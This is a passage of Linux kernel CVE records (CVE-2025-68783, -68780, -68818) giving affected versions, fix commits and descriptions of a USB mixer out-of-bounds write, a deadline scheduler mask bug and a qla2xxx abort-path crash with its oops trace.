| Linux | Linux | Affected: d2bb390a2081a36ffe906724d2848d846f2aeb29 , < 53461710a95e15ac1f6542450943a492ecf8e550 (git) |
| Linux | Linux | Affected: d2bb390a2081a36ffe906724d2848d846f2aeb29 , < 2168866396bd28ec4f3c8da0fbc7d08b5bd4f053 (git) |
| Linux | Linux | Affected: d2bb390a2081a36ffe906724d2848d846f2aeb29 , < cde47f4ccad6751ac36b7471572ddf38ee91870c (git) |
| Linux | Linux | Affected: d2bb390a2081a36ffe906724d2848d846f2aeb29 , < 2f21a7cbaaa93926f5be15bc095b9c57c35748d9 (git) |
| Linux | Linux | Affected: d2bb390a2081a36ffe906724d2848d846f2aeb29 , < a8ad320efb663be30b794e3dd3e829301c0d0ed3 (git) |
| Linux | Linux | Affected: d2bb390a2081a36ffe906724d2848d846f2aeb29 , < eaa95228b8a56c4880a182c0350d67922b22408f (git) |
| Linux | Linux | Affected: d2bb390a2081a36ffe906724d2848d846f2aeb29 , < 5526c1c6ba1d0913c7dfcbbd6fe1744ea7c55f1e (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"sound/usb/mixer_us16x08.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "53461710a95e15ac1f6542450943a492ecf8e550",
"status": "affected",
"version": "d2bb390a2081a36ffe906724d2848d846f2aeb29",
"versionType": "git"
},
{
"lessThan": "2168866396bd28ec4f3c8da0fbc7d08b5bd4f053",
"status": "affected",
"version": "d2bb390a2081a36ffe906724d2848d846f2aeb29",
"versionType": "git"
},
{
"lessThan": "cde47f4ccad6751ac36b7471572ddf38ee91870c",
"status": "affected",
"version": "d2bb390a2081a36ffe906724d2848d846f2aeb29",
"versionType": "git"
},
{
"lessThan": "2f21a7cbaaa93926f5be15bc095b9c57c35748d9",
"status": "affected",
"version": "d2bb390a2081a36ffe906724d2848d846f2aeb29",
"versionType": "git"
},
{
"lessThan": "a8ad320efb663be30b794e3dd3e829301c0d0ed3",
"status": "affected",
"version": "d2bb390a2081a36ffe906724d2848d846f2aeb29",
"versionType": "git"
},
{
"lessThan": "eaa95228b8a56c4880a182c0350d67922b22408f",
"status": "affected",
"version": "d2bb390a2081a36ffe906724d2848d846f2aeb29",
"versionType": "git"
},
{
"lessThan": "5526c1c6ba1d0913c7dfcbbd6fe1744ea7c55f1e",
"status": "affected",
"version": "d2bb390a2081a36ffe906724d2848d846f2aeb29",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"sound/usb/mixer_us16x08.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.11"
},
{
"lessThan": "4.11",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc3",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc3",
"versionStartIncluding": "4.11",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: usb-mixer: us16x08: validate meter packet indices\n\nget_meter_levels_from_urb() parses the 64-byte meter packets sent by\nthe device and fills the per-channel arrays meter_level[],\ncomp_level[] and master_level[] in struct snd_us16x08_meter_store.\n\nCurrently the function derives the channel index directly from the\nmeter packet (MUB2(meter_urb, s) - 1) and uses it to index those\narrays without validating the range. If the packet contains a\nnegative or out-of-range channel number, the driver may write past\nthe end of these arrays.\n\nIntroduce a local channel variable and validate it before updating the\narrays. We reject negative indices, limit meter_level[] and\ncomp_level[] to SND_US16X08_MAX_CHANNELS, and guard master_level[]\nupdates with ARRAY_SIZE(master_level)."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:01.170Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/53461710a95e15ac1f6542450943a492ecf8e550"
},
{
"url": "https://git.kernel.org/stable/c/2168866396bd28ec4f3c8da0fbc7d08b5bd4f053"
},
{
"url": "https://git.kernel.org/stable/c/cde47f4ccad6751ac36b7471572ddf38ee91870c"
},
{
"url": "https://git.kernel.org/stable/c/2f21a7cbaaa93926f5be15bc095b9c57c35748d9"
},
{
"url": "https://git.kernel.org/stable/c/a8ad320efb663be30b794e3dd3e829301c0d0ed3"
},
{
"url": "https://git.kernel.org/stable/c/eaa95228b8a56c4880a182c0350d67922b22408f"
},
{
"url": "https://git.kernel.org/stable/c/5526c1c6ba1d0913c7dfcbbd6fe1744ea7c55f1e"
}
],
"title": "ALSA: usb-mixer: us16x08: validate meter packet indices",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68783",
"datePublished": "2026-01-13T15:28:57.609Z",
"dateReserved": "2025-12-24T10:30:51.036Z",
"dateUpdated": "2026-01-19T12:19:01.170Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68780 (GCVE-0-2025-68780)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:28 – Updated: 2026-01-19 12:18
Title
sched/deadline: only set free_cpus for online runqueues
Summary
In the Linux kernel, the following vulnerability has been resolved:
sched/deadline: only set free_cpus for online runqueues
Commit 16b269436b72 ("sched/deadline: Modify cpudl::free_cpus
to reflect rd->online") introduced the cpudl_set/clear_freecpu
functions to allow the cpu_dl::free_cpus mask to be manipulated
by the deadline scheduler class rq_on/offline callbacks so the
mask would also reflect this state.
Commit 9659e1eeee28 ("sched/deadline: Remove cpu_active_mask
from cpudl_find()") removed the check of the cpu_active_mask to
save some processing on the premise that the cpudl::free_cpus
mask already reflected the runqueue online state.
Unfortunately, there are cases where it is possible for the
cpudl_clear function to set the free_cpus bit for a CPU when the
deadline runqueue is offline. When this occurs while a CPU is
connected to the default root domain the flag may retain the bad
state after the CPU has been unplugged. Later, a different CPU
that is transitioning through the default root domain may push a
deadline task to the powered down CPU when cpudl_find sees its
free_cpus bit is set. If this happens the task will not have the
opportunity to run.
One example is outlined here:
https://lore.kernel.org/lkml/20250110233010.2339521-1-opendmb@gmail.com
Another occurs when the last deadline task is migrated from a
CPU that has an offlined runqueue. The dequeue_task member of
the deadline scheduler class will eventually call cpudl_clear
and set the free_cpus bit for the CPU.
This commit modifies the cpudl_clear function to be aware of the
online state of the deadline runqueue so that the free_cpus mask
can be updated appropriately.
It is no longer necessary to manage the mask outside of the
cpudl_set/clear functions so the cpudl_set/clear_freecpu
functions are removed. In addition, since the free_cpus mask is
now only updated under the cpudl lock the code was changed to
use the non-atomic __cpumask functions.
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: 9659e1eeee28f7025b6545934d644d19e9c6e603 , < 9019e399684e3cc68c4a3f050e268f74d69c1317 (git) |
| Linux | Linux | Affected: 9659e1eeee28f7025b6545934d644d19e9c6e603 , < fb36846cbcc936954f2ad2bffdff13d16c0be08a (git) |
| Linux | Linux | Affected: 9659e1eeee28f7025b6545934d644d19e9c6e603 , < 91e448e69aca4bb0ba2e998eb3e555644db7322b (git) |
| Linux | Linux | Affected: 9659e1eeee28f7025b6545934d644d19e9c6e603 , < dbc61834b0412435df21c71410562d933e4eba49 (git) |
| Linux | Linux | Affected: 9659e1eeee28f7025b6545934d644d19e9c6e603 , < 3ed049fbfb4d75b4e0b8ab54c934f485129d5dc8 (git) |
| Linux | Linux | Affected: 9659e1eeee28f7025b6545934d644d19e9c6e603 , < 382748c05e58a9f1935f5a653c352422375566ea (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"kernel/sched/cpudeadline.c",
"kernel/sched/cpudeadline.h",
"kernel/sched/deadline.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "9019e399684e3cc68c4a3f050e268f74d69c1317",
"status": "affected",
"version": "9659e1eeee28f7025b6545934d644d19e9c6e603",
"versionType": "git"
},
{
"lessThan": "fb36846cbcc936954f2ad2bffdff13d16c0be08a",
"status": "affected",
"version": "9659e1eeee28f7025b6545934d644d19e9c6e603",
"versionType": "git"
},
{
"lessThan": "91e448e69aca4bb0ba2e998eb3e555644db7322b",
"status": "affected",
"version": "9659e1eeee28f7025b6545934d644d19e9c6e603",
"versionType": "git"
},
{
"lessThan": "dbc61834b0412435df21c71410562d933e4eba49",
"status": "affected",
"version": "9659e1eeee28f7025b6545934d644d19e9c6e603",
"versionType": "git"
},
{
"lessThan": "3ed049fbfb4d75b4e0b8ab54c934f485129d5dc8",
"status": "affected",
"version": "9659e1eeee28f7025b6545934d644d19e9c6e603",
"versionType": "git"
},
{
"lessThan": "382748c05e58a9f1935f5a653c352422375566ea",
"status": "affected",
"version": "9659e1eeee28f7025b6545934d644d19e9c6e603",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"kernel/sched/cpudeadline.c",
"kernel/sched/cpudeadline.h",
"kernel/sched/deadline.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.0"
},
{
"lessThan": "4.0",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "4.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "4.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "4.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "4.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "4.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "4.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nsched/deadline: only set free_cpus for online runqueues\n\nCommit 16b269436b72 (\"sched/deadline: Modify cpudl::free_cpus\nto reflect rd-\u003eonline\") introduced the cpudl_set/clear_freecpu\nfunctions to allow the cpu_dl::free_cpus mask to be manipulated\nby the deadline scheduler class rq_on/offline callbacks so the\nmask would also reflect this state.\n\nCommit 9659e1eeee28 (\"sched/deadline: Remove cpu_active_mask\nfrom cpudl_find()\") removed the check of the cpu_active_mask to\nsave some processing on the premise that the cpudl::free_cpus\nmask already reflected the runqueue online state.\n\nUnfortunately, there are cases where it is possible for the\ncpudl_clear function to set the free_cpus bit for a CPU when the\ndeadline runqueue is offline. When this occurs while a CPU is\nconnected to the default root domain the flag may retain the bad\nstate after the CPU has been unplugged. Later, a different CPU\nthat is transitioning through the default root domain may push a\ndeadline task to the powered down CPU when cpudl_find sees its\nfree_cpus bit is set. If this happens the task will not have the\nopportunity to run.\n\nOne example is outlined here:\nhttps://lore.kernel.org/lkml/20250110233010.2339521-1-opendmb@gmail.com\n\nAnother occurs when the last deadline task is migrated from a\nCPU that has an offlined runqueue. The dequeue_task member of\nthe deadline scheduler class will eventually call cpudl_clear\nand set the free_cpus bit for the CPU.\n\nThis commit modifies the cpudl_clear function to be aware of the\nonline state of the deadline runqueue so that the free_cpus mask\ncan be updated appropriately.\n\nIt is no longer necessary to manage the mask outside of the\ncpudl_set/clear functions so the cpudl_set/clear_freecpu\nfunctions are removed. In addition, since the free_cpus mask is\nnow only updated under the cpudl lock the code was changed to\nuse the non-atomic __cpumask functions."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:18:58.439Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/9019e399684e3cc68c4a3f050e268f74d69c1317"
},
{
"url": "https://git.kernel.org/stable/c/fb36846cbcc936954f2ad2bffdff13d16c0be08a"
},
{
"url": "https://git.kernel.org/stable/c/91e448e69aca4bb0ba2e998eb3e555644db7322b"
},
{
"url": "https://git.kernel.org/stable/c/dbc61834b0412435df21c71410562d933e4eba49"
},
{
"url": "https://git.kernel.org/stable/c/3ed049fbfb4d75b4e0b8ab54c934f485129d5dc8"
},
{
"url": "https://git.kernel.org/stable/c/382748c05e58a9f1935f5a653c352422375566ea"
}
],
"title": "sched/deadline: only set free_cpus for online runqueues",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68780",
"datePublished": "2026-01-13T15:28:55.483Z",
"dateReserved": "2025-12-24T10:30:51.036Z",
"dateUpdated": "2026-01-19T12:18:58.439Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68818 (GCVE-0-2025-68818)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-19 12:19
Title
scsi: Revert "scsi: qla2xxx: Perform lockless command completion in abort path"
Summary
In the Linux kernel, the following vulnerability has been resolved:
scsi: Revert "scsi: qla2xxx: Perform lockless command completion in abort path"
This reverts commit 0367076b0817d5c75dfb83001ce7ce5c64d803a9.
The commit being reverted added code to __qla2x00_abort_all_cmds() to
call sp->done() without holding a spinlock. But unlike the older code
below it, this new code failed to check sp->cmd_type and just assumed
TYPE_SRB, which results in a jump to an invalid pointer in target-mode
with TYPE_TGT_CMD:
qla2xxx [0000:65:00.0]-d034:8: qla24xx_do_nack_work create sess success
0000000009f7a79b
qla2xxx [0000:65:00.0]-5003:8: ISP System Error - mbx1=1ff5h mbx2=10h
mbx3=0h mbx4=0h mbx5=191h mbx6=0h mbx7=0h.
qla2xxx [0000:65:00.0]-d01e:8: -> fwdump no buffer
qla2xxx [0000:65:00.0]-f03a:8: qla_target(0): System error async event
0x8002 occurred
qla2xxx [0000:65:00.0]-00af:8: Performing ISP error recovery -
ha=0000000058183fda.
BUG: kernel NULL pointer dereference, address: 0000000000000000
PF: supervisor instruction fetch in kernel mode
PF: error_code(0x0010) - not-present page
PGD 0 P4D 0
Oops: 0010 [#1] SMP
CPU: 2 PID: 9446 Comm: qla2xxx_8_dpc Tainted: G O 6.1.133 #1
Hardware name: Supermicro Super Server/X11SPL-F, BIOS 4.2 12/15/2023
RIP: 0010:0x0
Code: Unable to access opcode bytes at 0xffffffffffffffd6.
RSP: 0018:ffffc90001f93dc8 EFLAGS: 00010206
RAX: 0000000000000282 RBX: 0000000000000355 RCX: ffff88810d16a000
RDX: ffff88810dbadaa8 RSI: 0000000000080000 RDI: ffff888169dc38c0
RBP: ffff888169dc38c0 R08: 0000000000000001 R09: 0000000000000045
R10: ffffffffa034bdf0 R11: 0000000000000000 R12: ffff88810800bb40
R13: 0000000000001aa8 R14: ffff888100136610 R15: ffff8881070f7400
FS: 0000000000000000(0000) GS:ffff88bf80080000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: ffffffffffffffd6 CR3: 000000010c8ff006 CR4: 00000000003706e0
DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Call Trace:
<TASK>
? __die+0x4d/0x8b
? page_fault_oops+0x91/0x180
? trace_buffer_unlock_commit_regs+0x38/0x1a0
? exc_page_fault+0x391/0x5e0
? asm_exc_page_fault+0x22/0x30
__qla2x00_abort_all_cmds+0xcb/0x3e0 [qla2xxx_scst]
qla2x00_abort_all_cmds+0x50/0x70 [qla2xxx_scst]
qla2x00_abort_isp_cleanup+0x3b7/0x4b0 [qla2xxx_scst]
qla2x00_abort_isp+0xfd/0x860 [qla2xxx_scst]
qla2x00_do_dpc+0x581/0xa40 [qla2xxx_scst]
kthread+0xa8/0xd0
</TASK>
Then commit 4475afa2646d ("scsi: qla2xxx: Complete command early within
lock") added the spinlock back, because not having the lock caused a
race and a crash. But qla2x00_abort_srb() in the switch below already
checks for qla2x00_chip_is_down() and handles it the same way, so the
code above the switch is now redundant and still buggy in target-mode.
Remove it.
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: 231cfa78ec5badd84a1a2b09465bfad1a926aba1 , < b04b3733fff7e94566386b962e4795550fbdfd3d (git) |
| Linux | Linux | Affected: d6f7377528d2abf338e504126e44439541be8f7d , < 50b097d92c99f718831b8b349722bc79f718ba1b (git) |
| Linux | Linux | Affected: cd0a1804ac5bab2545ac700c8d0fe9ae9284c567 , < c5c37a821bd1708f26a9522b4a6f47b9f7a20003 (git) |
| Linux | Linux | Affected: 0367076b0817d5c75dfb83001ce7ce5c64d803a9 , < e9e601b7df58ba0c667baf30263331df2c02ffe1 (git) |
| Linux | Linux | Affected: 0367076b0817d5c75dfb83001ce7ce5c64d803a9 , < b10ebbfd59a535c8d22f4ede6e8389622ce98dc0 (git) |
| Linux | Linux | Affected: 0367076b0817d5c75dfb83001ce7ce5c64d803a9 , < 1c728951bc769b795d377852eae1abddad88635d (git) |
| Linux | Linux | Affected: 0367076b0817d5c75dfb83001ce7ce5c64d803a9 , < b57fbc88715b6d18f379463f48a15b560b087ffe (git) |
| Linux | Linux | Affected: 9189f20b4c5307c0998682bb522e481b4567a8b8 (git) |
| Linux | Linux | Affected: 415d614344a4f1bbddf55d724fc7eb9ef4b39aad (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/scsi/qla2xxx/qla_os.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "b04b3733fff7e94566386b962e4795550fbdfd3d",
"status": "affected",
"version": "231cfa78ec5badd84a1a2b09465bfad1a926aba1",
"versionType": "git"
},
{
"lessThan": "50b097d92c99f718831b8b349722bc79f718ba1b",
"status": "affected",
"version": "d6f7377528d2abf338e504126e44439541be8f7d",
"versionType": "git"
},
{
"lessThan": "c5c37a821bd1708f26a9522b4a6f47b9f7a20003",
"status": "affected",
"version": "cd0a1804ac5bab2545ac700c8d0fe9ae9284c567",
"versionType": "git"
},
{
"lessThan": "e9e601b7df58ba0c667baf30263331df2c02ffe1",
"status": "affected",
"version": "0367076b0817d5c75dfb83001ce7ce5c64d803a9",
"versionType": "git"
},
{
"lessThan": "b10ebbfd59a535c8d22f4ede6e8389622ce98dc0",
"status": "affected",
"version": "0367076b0817d5c75dfb83001ce7ce5c64d803a9",
"versionType": "git"
},
{
"lessThan": "1c728951bc769b795d377852eae1abddad88635d",
"status": "affected",
"version": "0367076b0817d5c75dfb83001ce7ce5c64d803a9",
"versionType": "git"
},
{
"lessThan": "b57fbc88715b6d18f379463f48a15b560b087ffe",
"status": "affected",
"version": "0367076b0817d5c75dfb83001ce7ce5c64d803a9",
"versionType": "git"
},
{
"status": "affected",
"version": "9189f20b4c5307c0998682bb522e481b4567a8b8",
"versionType": "git"
},
{
"status": "affected",
"version": "415d614344a4f1bbddf55d724fc7eb9ef4b39aad",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/scsi/qla2xxx/qla_os.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.3"
},
{
"lessThan": "6.3",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "5.10.177",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "5.15.105",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "6.1.22",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "6.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "6.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "6.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.4.240",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.2.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: Revert \"scsi: qla2xxx: Perform lockless command completion in abort path\"\n\nThis reverts commit 0367076b0817d5c75dfb83001ce7ce5c64d803a9.\n\nThe commit being reverted added code to __qla2x00_abort_all_cmds() to\ncall sp-\u003edone() without holding a spinlock. But unlike the older code\nbelow it, this new code failed to check sp-\u003ecmd_type and just assumed\nTYPE_SRB, which results in a jump to an invalid pointer in target-mode\nwith TYPE_TGT_CMD:\n\nqla2xxx [0000:65:00.0]-d034:8: qla24xx_do_nack_work create sess success\n 0000000009f7a79b\nqla2xxx [0000:65:00.0]-5003:8: ISP System Error - mbx1=1ff5h mbx2=10h\n mbx3=0h mbx4=0h mbx5=191h mbx6=0h mbx7=0h.\nqla2xxx [0000:65:00.0]-d01e:8: -\u003e fwdump no buffer\nqla2xxx [0000:65:00.0]-f03a:8: qla_target(0): System error async event\n 0x8002 occurred\nqla2xxx [0000:65:00.0]-00af:8: Performing ISP error recovery -\n ha=0000000058183fda.\nBUG: kernel NULL pointer dereference, address: 0000000000000000\nPF: supervisor instruction fetch in kernel mode\nPF: error_code(0x0010) - not-present page\nPGD 0 P4D 0\nOops: 0010 [#1] SMP\nCPU: 2 PID: 9446 Comm: qla2xxx_8_dpc Tainted: G O 6.1.133 #1\nHardware name: Supermicro Super Server/X11SPL-F, BIOS 4.2 12/15/2023\nRIP: 0010:0x0\nCode: Unable to access opcode bytes at 0xffffffffffffffd6.\nRSP: 0018:ffffc90001f93dc8 EFLAGS: 00010206\nRAX: 0000000000000282 RBX: 0000000000000355 RCX: ffff88810d16a000\nRDX: ffff88810dbadaa8 RSI: 0000000000080000 RDI: ffff888169dc38c0\nRBP: ffff888169dc38c0 R08: 0000000000000001 R09: 0000000000000045\nR10: ffffffffa034bdf0 R11: 0000000000000000 R12: ffff88810800bb40\nR13: 0000000000001aa8 R14: ffff888100136610 R15: ffff8881070f7400\nFS: 0000000000000000(0000) GS:ffff88bf80080000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: ffffffffffffffd6 CR3: 000000010c8ff006 CR4: 00000000003706e0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nCall Trace:\n \u003cTASK\u003e\n ? __die+0x4d/0x8b\n ? page_fault_oops+0x91/0x180\n ? trace_buffer_unlock_commit_regs+0x38/0x1a0\n ? exc_page_fault+0x391/0x5e0\n ? asm_exc_page_fault+0x22/0x30\n __qla2x00_abort_all_cmds+0xcb/0x3e0 [qla2xxx_scst]\n qla2x00_abort_all_cmds+0x50/0x70 [qla2xxx_scst]\n qla2x00_abort_isp_cleanup+0x3b7/0x4b0 [qla2xxx_scst]\n qla2x00_abort_isp+0xfd/0x860 [qla2xxx_scst]\n qla2x00_do_dpc+0x581/0xa40 [qla2xxx_scst]\n kthread+0xa8/0xd0\n \u003c/TASK\u003e\n\nThen commit 4475afa2646d (\"scsi: qla2xxx: Complete command early within\nlock\") added the spinlock back, because not having the lock caused a\nrace and a crash. But qla2x00_abort_srb() in the switch below already\nchecks for qla2x00_chip_is_down() and handles it the same way, so the\ncode above the switch is now redundant and still buggy in target-mode.\nRemove it."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:22.778Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/b04b3733fff7e94566386b962e4795550fbdfd3d"
},
{
"url": "https://git.kernel.org/stable/c/50b097d92c99f718831b8b349722bc79f718ba1b"
},
{
"url": "https://git.kernel.org/stable/c/c5c37a821bd1708f26a9522b4a6f47b9f7a20003"
},
{
"url": "https://git.kernel.org/stable/c/e9e601b7df58ba0c667baf30263331df2c02ffe1"
},
{
"url": "https://git.kernel.org/stable/c/b10ebbfd59a535c8d22f4ede6e8389622ce98dc0"
},
{
"url": "https://git.kernel.org/stable/c/1c728951bc769b795d377852eae1abddad88635d"
},
{
"url": "https://git.kernel.org/stable/c/b57fbc88715b6d18f379463f48a15b560b087ffe"
}
],
